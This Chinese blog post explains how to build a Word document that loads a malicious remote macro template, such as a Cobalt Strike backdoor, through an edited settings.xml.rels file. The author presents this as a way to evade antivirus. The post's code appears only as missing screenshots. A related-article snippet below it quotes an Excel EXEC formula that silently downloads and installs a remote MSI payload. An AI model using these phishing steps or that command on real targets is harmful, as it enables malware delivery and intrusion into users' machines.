实现一个远程宏模板执行恶意代码

最新推荐文章于 2023-06-30 14:30:35 发布
最新推荐文章于 2023-06-30 14:30:35 发布
阅读量765 收藏 1
点赞数
分类专栏: 病毒分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44001905/article/details/109583271
版权

文章目录

原理

word远程宏模板是利用word文档加载附加模板时向远程服务器发起请求而达成攻击的目的,请求并加载远程的恶意宏模板可用来执行恶意行为

文档本身无恶意代码,内容中只有指向远程服务器地址的url,可以绕过安全软件的静态查杀

实现

创建宏模板

在这里生成了两种宏模板,一种是cs生成的后门,一种是测试的弹框宏代码

使用CS,生成宏代码

在这里插入图片描述

创建一个docx文件,Alt+F11 启动vb编辑器,将代码粘贴进去,另存为dotm文件

在这里插入图片描述

测试弹框的宏代码

在这里插入图片描述

创建加载远程宏文档文件

创建一个docx文件,将docx解压,修改./word/_rels/下的settings.xml.rels文件

在这里插入图片描述

重新打包

在这里插入图片描述

运行

使用phpstudy搭建一个临时的web服务器,将两种模板放入网站根目录

在这里插入图片描述

运行后会捕捉到如下界面

在这里插入图片描述

发现存在安全警告,说明宏模板已经被加载进来

在这里插入图片描述

点击启用内容,会弹出宏模板的弹框

在这里插入图片描述

将服务器的宏模板换为cs后门的宏代码时,会出现如下提示,需要在信任中心进行设置才能运行

在这里插入图片描述

总结

实现远程宏模板主要有几个关键点

1.需要创建一个带./word/_rels/settings.xml.rels文件的docx

2.在更改远程地址后压缩解压后的DOCX文档目录,不能在父目录下压缩,要以仅存储形式压缩

利用DOCX文档远程模板注入执行
god_Zeo的安全博客
10-28 2259
利用DOCX文档远程模板注入执行 原理: 与传统的启用文档相比,这种攻击的好处是多方面的。在对目标执行网络钓鱼攻击时,您可以将.docx的文档直接附加到电子邮件中,并且您不太可能根据文件的拓展名去阻止它。 Word远程模板执行就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然...
网络安全-恶意代码
buctwx的博客
02-27 1259
恶意代码程序
利用DOCX文档远程模板注入执行代码
weixin_44922845的博客
04-03 2938
利用DOCX文档远程模板注入执行代码 简介 本地文件中在没有代码的情况下,攻击者可以尝试执行远程文件中代码。其中来自APT28的最新样本将此技术展现的淋漓尽致。该样本是docx文件,文件内没有任何相关信息,但是打开该文件后,却会弹出经典的“安全警告”。本实验将实现通过远程加载执行代码的攻击方式。 应用场景 该种攻击方式与传统的启用文档相比,这种攻击的好处是多方面的。在对目标执行网络...
一个简单的远程攻击方法
studydotnet的专栏
01-03 1612
在命令窗口下用ping如:C:/ping -l 65500 -t 192.168.0.110该命令给目标机器不断发送65500个数据包一台电脑无法完成攻击工作,但是数台就很快可以使对方机器瘫痪!
pve远程连接 spcie_剑网3PVE远程输出 新版本花间分享
weixin_39608063的博客
02-19 2846
本文为大家分享剑网3新版本远程输出之万花·花间输出。一、全自动版1:/fcast [|tbufftime:钟林毓秀<4.2] 芙蓉并蒂/cast [tnobuff:兰摧玉折] 兰摧玉折/cast [tnobuff:商阳指] 商阳指/cast [nobuff:恣游] 阳明指/cast [buff:恣游<=4] 阳明指2:/cast [mana<0.4&bufftim...
网络安全之内外网渗透-网络钓鱼技巧
最新发布
weixin_46626737的博客
06-30 309
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用的文件,在通过邮件发。利用生成的代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择,取名,编辑,在编辑弹出的框中加。
VBA实现Excel模块远程自动升级解决方案
- **代码执行风险**:自动运行代码可能会带来安全风险,因为恶意代码也可以通过这种方式传播。因此,在使用此类自动更新功能时,应确保源代码的安全性和可信度。 - **备份重要数据**:在更新代码之前,应当做好...
恶意代码机理与防护笔记
weixin_54558860的博客
05-21 497
DOS部首和PE文件头及块表连续存储,中间没有空隙而块表和块之间由于文件对齐可能会存在空隙块和块之间也由于文件对齐可能会存在空隙。
exp4恶意代码分析实验报告-20202127
qq_57435798的博客
04-05 2662
本次实验的重点是借用软件工具,通过工具来具体分析恶意代码,通过对后门文件的多方面分析检测,查看是否主机中有可疑对象和可疑行为,这对平时主机的使用和保护都有着重大的实际作用。这个程序对系统的正常运行是非常重要,而且是不能被结束的。这次试验任务量比之前的三次实验大了很多,而且比较侧重于自己分析,通过利用一些专业的分析工具,可以对恶意代码进行静态和动态的分析,这些工具除了wireshark在之前学习使用过,其他工具都是从没有听说过,通过这些工具的使用也让我对恶意代码有了更深的认识。以后还要加强这方面的学习。
病毒的研究与实例分析05——无文件携带病毒
鬼手的博客
03-11 1799
文章目录前言远程模板注入执行docx文件格式解析窃取NTLM Hashes小结说明 前言 docx文件可能是病毒吗? 如果你是一周前问笔者这个问题,笔者一定会斩钉截铁的说:”不可能!” 。笔者在之前的文章中提到过,docx中是不含的,所以不可能是病毒。但是,现在笔者却会斩钉截铁的说:”即使没有也可能是病毒!”。 故事要从很久很久以前说起,office文档诞生后不久,就迅速占领各大平台,...
远程加载含有恶意代码的word模版文件上线CS
热门推荐
Shanfenglan's blog
08-31 24万+
原理 将直接加载远程带有的恶意模版使用。 缺点 目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github),受害者可能在文件打开一半的时候强制关闭word。 优点 因为是远程加载,所以免杀效果十分不错。基本不会被杀毒软件拦截。 实现 第一步:制作一个恶意的模版并确保能够上线 这里以cs的木马为例。 获取到恶意的VB代码后打开word,在工具栏的空白区域右键,点击自定义功能区 勾选开发工具选项。 此时就会出现开发工具这一栏 此时点击Visual basi
渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四)
qq_34801745的博客
12-17 4248
** 渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四) ** 作者:大余 时间:2020-12-16 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定
RedTeam-钓鱼&文件名反转&office远程模板
qq_45434762的博客
11-28 2055
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
亲手编制Word病毒 深入理解恶意
weixin_33921089的博客
11-22 928
互联网真是陷阱的天堂,这不,小风刚刚上网下载了一个Doc文件,启动Word想打开文档看看,结果自己D盘的一大堆文件不见了,敢情Word文件也能带病毒呀!今天渔歌特意请来无风来为大家做一个简单的Word病毒,以此来让大家了解一下——   第一步:启动Word 2003(同样适合Word 2000/XP),单击“插入→对象”命令,在弹出的“对象”...
文档病毒
weixin_43781139的博客
07-16 3650
文档类病毒介绍 许多恶意代码都是通过文档进行传播。利用文档文件投放PE文件,再由PE文件执行恶意行为。一方面,结合社会工程学的诱导文档往往能够降低目标人员的安全防范意识,提高攻击的成功率;另一方面,文档可以通过邮件进行传播,而邮件作为最常用的通信方式,对邮箱的攻击,更容易收集用户信息并实现内网渗透。 下图是奇安信威胁情报中心在2018年全球高级持续性威胁研究总结报告中列出的部分组织鱼叉邮件攻击特点: 可以看到采用诱导文档附件进行的钓鱼邮件攻击的方式最为普遍。掌握各类文档文件的分析技巧就变得极为重要,我们将
Synares感染型简单分析
信息安全
10-24 2万+
文章目录前言样本简单分析 前言 Synares是去年出现的感染型病毒,当时为了弄清病毒的感染逻辑,也大致分析了一下这个病毒,最近整理文档,又发现了之前写的简短的分析报告 样本简单分析 当运行非C:\ProgramData\Synaptics\Synaptics.exe目录的病毒文件,首先查找自己的资源是否存在,(资源名EXERESX是被感染的前的源文件,如果存在EXERESX资源说明这是一个已经被感染的文件),存在后释放到当前目录并隐藏,创建进程执行释放的源文件。 样本会判断互斥体避免多开,获取一些资源
bat脚本编码加密的简单解密方法
信息安全
09-26 5929
在分析病毒时,总会遇见各种各样的类型的样本,bat脚本病毒也非常常见,bat属于脚本语言,用文本查看器查看源码会一目了然,有很多人不希望让别人看到自己的源码,也就有了一些算是加密的方式 本次我要分享的就是利用字符集编码产生的加密方式的解密方法 拿到一个bat脚本,用notepad++打开发现都是乱码 挦獬਍敀档景൦䌊尺楗摮睯屳祓瑳浥㈳坜湩潤獷潐敷卲敨汬癜⸱尰潰敷獲敨汬攮數ⴠ硅捥瑵潩偮汯捩⁹祢慰獳...
Morto蠕虫病毒分析报告
信息安全
10-31 4875
文章目录样本信息病毒现场复现分析过程Loader部分Payload部分病毒查杀 样本信息 名称:cache.txt SHA1:a5f83e3baae0df2cdcf5b7e9e862705aeb2caedb 病毒现场复现 因为得到的样本没有病毒母体,所以只能手动复现病毒现场,手动复现病毒现场需要两个文件,一个伪装成txt的病毒dll文件,另一个是写入注册表的payload 首先将md.reg...
一个恶意样本的分析
信息安全
08-09 4488
1.1样本信息1.样本概况 病毒名称:bea213f1c932455aee8ff6fde346b1d1960d57ff MD5: 6E4B0A001C493F0FCF8C5E9020958F38 SHA1: BEA213F1C932455AEE8FF6FDE346B1D1960D57FF CRC32: 1CD8074D 1.2测试环境及工具 2.1.1 测试环境 Windows ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值